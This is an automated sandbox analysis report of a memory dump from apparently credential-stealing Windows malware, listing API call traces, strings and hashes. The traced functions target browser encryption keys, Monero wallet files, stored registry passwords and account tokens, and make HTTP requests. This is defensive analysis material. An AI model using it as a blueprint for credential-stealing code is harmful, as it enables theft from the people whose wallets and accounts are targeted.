                                  • Opcode Fuzzy Hash: 49307908df56df3dd6ae333c0b3820e9f769bcf03ddf07746b88523dd12f32f9
                                  • Instruction Fuzzy Hash: D512F371810128EBDB15FBA0EC96FDDB778AF14300F504169F50666192EF386B8ACF96
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 00716280: InternetOpenA.WININET(00730DFE,00000001,00000000,00000000,00000000), ref: 007162E1
                                    • Part of subcall function 00716280: StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716303
                                    • Part of subcall function 00716280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00716335
                                    • Part of subcall function 00716280: HttpOpenRequestA.WININET(00000000,GET,?,0122E9C8,00000000,00000000,00400100,00000000), ref: 00716385
                                    • Part of subcall function 00716280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007163BF
                                    • Part of subcall function 00716280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007163D1
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00725318
                                  • lstrlen.KERNEL32(00000000), ref: 0072532F
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00725364
                                  • lstrlen.KERNEL32(00000000), ref: 00725383
                                  • lstrlen.KERNEL32(00000000), ref: 007253AE
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3240024479-1526165396
                                  • Opcode ID: 5bee80b87595d12ec747a7508414fa099deb3c72ad8177045474f22c7fb7512d
                                  • Instruction ID: b92c716c545c43275b0691912b6f2157cb6725a14d5f9ce59b506db76d9e12ba
                                  • Opcode Fuzzy Hash: 5bee80b87595d12ec747a7508414fa099deb3c72ad8177045474f22c7fb7512d
                                  • Instruction Fuzzy Hash: ED512E70910158EBDB18FF64ED9AAED7779EF14301F504028F5065A192EF3C6B46CBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 5c42a5cd80b74e5b4c6037a8b1192b600b4703071aa088fc95e8bb77a31fb0a5
                                  • Instruction ID: 4bbeab97e9fbbbf7c0f8c8f1e4260d753a11b16abddc96f50d6e7ffb739c74aa
                                  • Opcode Fuzzy Hash: 5c42a5cd80b74e5b4c6037a8b1192b600b4703071aa088fc95e8bb77a31fb0a5
                                  • Instruction Fuzzy Hash: C5C1B7B5900229EBCB14EF60EC8DFEA7378BF64304F004599F50A67241DB78AA85DF95
                                  APIs
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007242EC
                                  • lstrcat.KERNEL32(?,0122F130), ref: 0072430B
                                  • lstrcat.KERNEL32(?,?), ref: 0072431F
                                  • lstrcat.KERNEL32(?,0122E0A8), ref: 00724333
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 00728D90: GetFileAttributesA.KERNEL32(00000000,?,00711B54,?,?,0073564C,?,?,00730E1F), ref: 00728D9F
                                    • Part of subcall function 00719CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00719D39
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                    • Part of subcall function 007293C0: GlobalAlloc.KERNEL32(00000000,007243DD,007243DD), ref: 007293D3
                                  • StrStrA.SHLWAPI(?,0122F028), ref: 007243F3
                                  • GlobalFree.KERNEL32(?), ref: 00724512
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719AEF
                                    • Part of subcall function 00719AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00714EEE,00000000,?), ref: 00719B01
                                    • Part of subcall function 00719AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nq,00000000,00000000), ref: 00719B2A
                                    • Part of subcall function 00719AC0: LocalFree.KERNEL32(?,?,?,?,00714EEE,00000000,?), ref: 00719B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 007244A3
                                  • StrCmpCA.SHLWAPI(?,007308D1), ref: 007244C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007244D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 007244E5
                                  • lstrcat.KERNEL32(00000000,00730FB8), ref: 007244F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID:
                                  • API String ID: 3541710228-0
                                  • Opcode ID: 3e6d2a89cf4f8725f0e2382e25dc7a8dc6ebead377268186d1796eb7c97c8122
                                  • Instruction ID: c51251bd6faa32eff55e814cfe4fc6350bc9cc267f5c161c44d7b9f2e10d26f7
                                  • Opcode Fuzzy Hash: 3e6d2a89cf4f8725f0e2382e25dc7a8dc6ebead377268186d1796eb7c97c8122
                                  • Instruction Fuzzy Hash: 3B7167B6910218BBDB14EBA4EC99FEE737DAB48300F004598F60597181EA39DB55CB92
                                  APIs
                                    • Part of subcall function 007112A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007112B4
                                    • Part of subcall function 007112A0: RtlAllocateHeap.NTDLL(00000000), ref: 007112BB
                                    • Part of subcall function 007112A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007112D7
                                    • Part of subcall function 007112A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007112F5
                                    • Part of subcall function 007112A0: RegCloseKey.ADVAPI32(?), ref: 007112FF
                                  • lstrcat.KERNEL32(?,00000000), ref: 0071134F
                                  • lstrlen.KERNEL32(?), ref: 0071135C
                                  • lstrcat.KERNEL32(?,.keys), ref: 00711377
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00711465
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                    • Part of subcall function 007199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                    • Part of subcall function 007199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                    • Part of subcall function 007199C0: ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                    • Part of subcall function 007199C0: LocalFree.KERNEL32(0071148F), ref: 00719A90
                                    • Part of subcall function 007199C0: CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 007114EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 3478931302-218353709
                                  • Opcode ID: 9a0e579a7332a65f11c249b6b6856ea587a9f1fbe07f3182c463960122a32069
                                  • Instruction ID: cdf0841b7921fa80f6e0a69b305c1f0771e7c9e40c36dccc3aa2728121d38b7b
                                  • Opcode Fuzzy Hash: 9a0e579a7332a65f11c249b6b6856ea587a9f1fbe07f3182c463960122a32069
                                  • Instruction Fuzzy Hash: 0C5159B1D50129E7C715FB60EC96FED737CAF54300F4045A8B60A62082EE386B85CF96
                                  APIs
                                    • Part of subcall function 007172D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0071733A
                                    • Part of subcall function 007172D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007173B1
                                    • Part of subcall function 007172D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0071740D
                                    • Part of subcall function 007172D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00717452
                                    • Part of subcall function 007172D0: HeapFree.KERNEL32(00000000), ref: 00717459
                                  • lstrcat.KERNEL32(00000000,007317FC), ref: 00717606
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00717648
                                  • lstrcat.KERNEL32(00000000, : ), ref: 0071765A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0071768F
                                  • lstrcat.KERNEL32(00000000,00731804), ref: 007176A0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 007176D3
                                  • lstrcat.KERNEL32(00000000,00731808), ref: 007176ED
                                  • task.LIBCPMTD ref: 007176FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID: :
                                  • API String ID: 2677904052-3653984579
                                  • Opcode ID: e7a1351df8951a6fb9752cd1fd5554cae1329429607b283f1999fab7be84eb5b
                                  • Instruction ID: e90bb9c497785459fa1d8d9d2810998e65565170604f2399ebea93cab129bf55
                                  • Opcode Fuzzy Hash: e7a1351df8951a6fb9752cd1fd5554cae1329429607b283f1999fab7be84eb5b
                                  • Instruction Fuzzy Hash: 0C318372915209EFCB08EBB9EC99DFF7774BB44302F144218F102A7191DA38AD82DB56
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0122ED88,00000000,?,00730E2C,00000000,?,00000000), ref: 00728130
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00728137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00728158
                                  • __aulldiv.LIBCMT ref: 00728172
                                  • __aulldiv.LIBCMT ref: 00728180
                                  • wsprintfA.USER32 ref: 007281AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: e1931f91de9f6907469d51f07d28daf8ecfe684b1847d7db06e633f7318ce054
                                  • Instruction ID: 40b84fecf30646a28bd65c0a0f5e6b2ef72ac6e607b23ed6a4cffa285d22ceb1
                                  • Opcode Fuzzy Hash: e1931f91de9f6907469d51f07d28daf8ecfe684b1847d7db06e633f7318ce054
                                  • Instruction Fuzzy Hash: 6C211FB1D44318ABDB10DFD5DC49FAEB7B8FB44711F104609F605BB280D77969018BA9
                                  APIs
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 007147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00714839
                                    • Part of subcall function 007147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00714849
                                  • InternetOpenA.WININET(00730DF7,00000001,00000000,00000000,00000000), ref: 0071610F
                                  • StrCmpCA.SHLWAPI(?,0122F5C8), ref: 00716147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0071618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007161B3
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 007161DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0071620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00716249
                                  • InternetCloseHandle.WININET(?), ref: 00716253
                                  • InternetCloseHandle.WININET(00000000), ref: 00716260
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 5ff596219b57bdca0a405a4304e85234e488dbb91fce613ab49c24102b7f1767
                                  • Instruction ID: 38a8bca5eedae2df3eccedb141d2e2051d83ed5251d17b1adc65815999a1cca0
                                  • Opcode Fuzzy Hash: 5ff596219b57bdca0a405a4304e85234e488dbb91fce613ab49c24102b7f1767
                                  • Instruction Fuzzy Hash: B7518EB1A10218ABDB20DFA4DC49BEE77B8FB08701F108198F605A71C1DB786A85DF95
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0071733A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007173B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0071740D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00717452
                                  • HeapFree.KERNEL32(00000000), ref: 00717459
                                  • task.LIBCPMTD ref: 00717555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuetask
                                  • String ID: Password
                                  • API String ID: 775622407-3434357891
                                  • Opcode ID: 5b3f5a08d3de66baa8c142dc33cab27fcca14e8aa2a3992401be743d64625225
                                  • Instruction ID: ead7f364c7c80617118cb2c38fe77778abefe15ceeedc7da261a371c0e847150
                                  • Opcode Fuzzy Hash: 5b3f5a08d3de66baa8c142dc33cab27fcca14e8aa2a3992401be743d64625225
                                  • Instruction Fuzzy Hash: 92614BB5D0426CDBDB24DB54CC55BD9B7B8BF48300F0081E9E689A6181EB785BC9CFA1
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  • lstrlen.KERNEL32(00000000), ref: 0071BC9F
                                    • Part of subcall function 00728E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00728E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0071BCCD
                                  • lstrlen.KERNEL32(00000000), ref: 0071BDA5
                                  • lstrlen.KERNEL32(00000000), ref: 0071BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: 95538b754b327f8bb6a43dab39fe64b73ef3fd95fb46c2a2c653f8a7521149cc
                                  • Instruction ID: 135aea18615e46178418cde479142cf030087be40cbad7ea44326f3a0b8e5c63
                                  • Opcode Fuzzy Hash: 95538b754b327f8bb6a43dab39fe64b73ef3fd95fb46c2a2c653f8a7521149cc
                                  • Instruction Fuzzy Hash: 19B13571910218EBDB05FBA0ED5AEEE7378FF54300F404568F506A6192EF386E49CB66
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 0d2f72125b73b8c3522914786a3d91f6386ca6393f461d7e413abc153babd917
                                  • Instruction ID: 2cb3c46b59346129071556d2d59a215285b13c604f0354a4cd741a23bafaf9e2
                                  • Opcode Fuzzy Hash: 0d2f72125b73b8c3522914786a3d91f6386ca6393f461d7e413abc153babd917
                                  • Instruction Fuzzy Hash: 1DF05E30D18319EFD3449FE2E909B2C7F70FB08703F040299E60986390D6744B41AB9A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00714FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00714FD1
                                  • InternetOpenA.WININET(00730DDF,00000000,00000000,00000000,00000000), ref: 00714FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00715011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00715041
                                  • InternetCloseHandle.WININET(?), ref: 007150B9
                                  • InternetCloseHandle.WININET(?), ref: 007150C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 8b0123902350963bc1b004cdde4e7d199652461cdf55555a85c99c7a56f50676
                                  • Instruction ID: cd36c160b8d4aeaa40f9061b496b34e61016b76ccd418754a594ca4701f76684
                                  • Opcode Fuzzy Hash: 8b0123902350963bc1b004cdde4e7d199652461cdf55555a85c99c7a56f50676
                                  • Instruction Fuzzy Hash: 2D3105B4A00218EBDB24CF94DC85BDCB7B4EB48705F1081D8EB09A7281D7746EC59F99
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00728426
                                  • wsprintfA.USER32 ref: 00728459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0072847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0072848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00728499
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0122EDB8,00000000,000F003F,?,00000400), ref: 007284EC
                                  • lstrlen.KERNEL32(?), ref: 00728501
                                  • RegQueryValueExA.ADVAPI32(00000000,0122ED58,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00730B34), ref: 00728599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00728608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0072861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: f55c00106ec5a23a6b9043ec7a09e6ec6143b7a35dc5672cd459ff753a5ad046
                                  • Instruction ID: 65de0dc1117f99b2493a35e80bc329161d05e30e2ec49943dcf924f9495fbacc
                                  • Opcode Fuzzy Hash: f55c00106ec5a23a6b9043ec7a09e6ec6143b7a35dc5672cd459ff753a5ad046
                                  • Instruction Fuzzy Hash: 792139B191022CABDB64DB54DC85FE9B3B8FB48701F00C2D8E609A6140DF756A81CFD5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007276A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007276AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0121CC00,00000000,00020119,00000000), ref: 007276DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0122ECC8,00000000,00000000,?,000000FF), ref: 007276FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00727708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: c476b168452c96b8f9ba37299a7381ff5469806b1193fdcaca811ce6404b56f6
                                  • Instruction ID: a9a2c0983ff169a27b0ffbada48632ea581065c097b152d87ee07d39f557e993
                                  • Opcode Fuzzy Hash: c476b168452c96b8f9ba37299a7381ff5469806b1193fdcaca811ce6404b56f6
                                  • Instruction Fuzzy Hash: 8301A2B4A18308BFE700DBE2ED49F6DB7B8EB08702F004154FB04D7290E6749900DB55
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0072773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0121CC00,00000000,00020119,007276B9), ref: 0072775B
                                  • RegQueryValueExA.ADVAPI32(007276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0072777A
                                  • RegCloseKey.ADVAPI32(007276B9), ref: 00727784
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: 437aaf5ed29e716a454f38598248f93d305f7aba3f29cda8e24f758a359a866e
                                  • Instruction ID: c3ef3e6069661c0ab6562acfe08d76abfb267678e5c26ca858498e9511b3c992
                                  • Opcode Fuzzy Hash: 437aaf5ed29e716a454f38598248f93d305f7aba3f29cda8e24f758a359a866e
                                  • Instruction Fuzzy Hash: 710144B5A54308BFD700DBE5DC49FAEB7B8EB48701F004254FA05A7281D67455009B95
                                  APIs
                                  • CreateFileA.KERNEL32(:r,80000000,00000003,00000000,00000003,00000080,00000000,?,00723AEE,?), ref: 007292FC
                                  • GetFileSizeEx.KERNEL32(000000FF,:r), ref: 00729319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00729327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID: :r$:r
                                  • API String ID: 1378416451-1407874444
                                  • Opcode ID: 7e43185ff1230b724ee7d4063b53c120cf10bbf7e90031708ae1f9a0952825b0
                                  • Instruction ID: d7c5055974e1dc4d7262299d4841b7f2ba416a14c7fe0fa5103f8fe889b9f304
                                  • Opcode Fuzzy Hash: 7e43185ff1230b724ee7d4063b53c120cf10bbf7e90031708ae1f9a0952825b0
                                  • Instruction Fuzzy Hash: 24F04935E54308BBDB10DFB1EC49F9E7BB9AB48721F10C254BA51A72C0D674AA019B84
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007199EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00719A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00719A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,0071148F,00000000), ref: 00719A5A
                                  • LocalFree.KERNEL32(0071148F), ref: 00719A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00719A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: e0b184b6df0eb6623c3de1d3adec592acf96873dcb286d55aa573aac49cc70bd
                                  • Instruction ID: 32c76dba82d483fc1056dea92fc5af1689620685bd7448a4b7def2378074e9a3
                                  • Opcode Fuzzy Hash: e0b184b6df0eb6623c3de1d3adec592acf96873dcb286d55aa573aac49cc70bd
                                  • Instruction Fuzzy Hash: 30312B74A00209EFDB14CF95D895BEE77B5FF48301F108158EA01A72D0D779A986CFA1
                                  APIs
                                  • lstrcat.KERNEL32(?,0122F130), ref: 007247DB
                                    • Part of subcall function 00728DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00728E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724801
                                  • lstrcat.KERNEL32(?,?), ref: 00724820
                                  • lstrcat.KERNEL32(?,?), ref: 00724834
                                  • lstrcat.KERNEL32(?,0121C288), ref: 00724847
                                  • lstrcat.KERNEL32(?,?), ref: 0072485B
                                  • lstrcat.KERNEL32(?,0122E960), ref: 0072486F
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 00728D90: GetFileAttributesA.KERNEL32(00000000,?,00711B54,?,?,0073564C,?,?,00730E1F), ref: 00728D9F
                                    • Part of subcall function 00724570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00724580
                                    • Part of subcall function 00724570: RtlAllocateHeap.NTDLL(00000000), ref: 00724587
                                    • Part of subcall function 00724570: wsprintfA.USER32 ref: 007245A6
                                    • Part of subcall function 00724570: FindFirstFileA.KERNEL32(?,?), ref: 007245BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID:
                                  • API String ID: 2540262943-0
                                  • Opcode ID: 251b435de145391fd3459d8968631ea17be0e786e3706915ee1432534412ef38
                                  • Instruction ID: b1adcf093e66d75859e4739eb73ce4bba580be9391399d90ebf8320a4f418a1f
                                  • Opcode Fuzzy Hash: 251b435de145391fd3459d8968631ea17be0e786e3706915ee1432534412ef38
                                  • Instruction Fuzzy Hash: 163164B2910318A7CB54F7B0EC89EED737CBB58700F404589B35596081EE79ABC9CB96
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
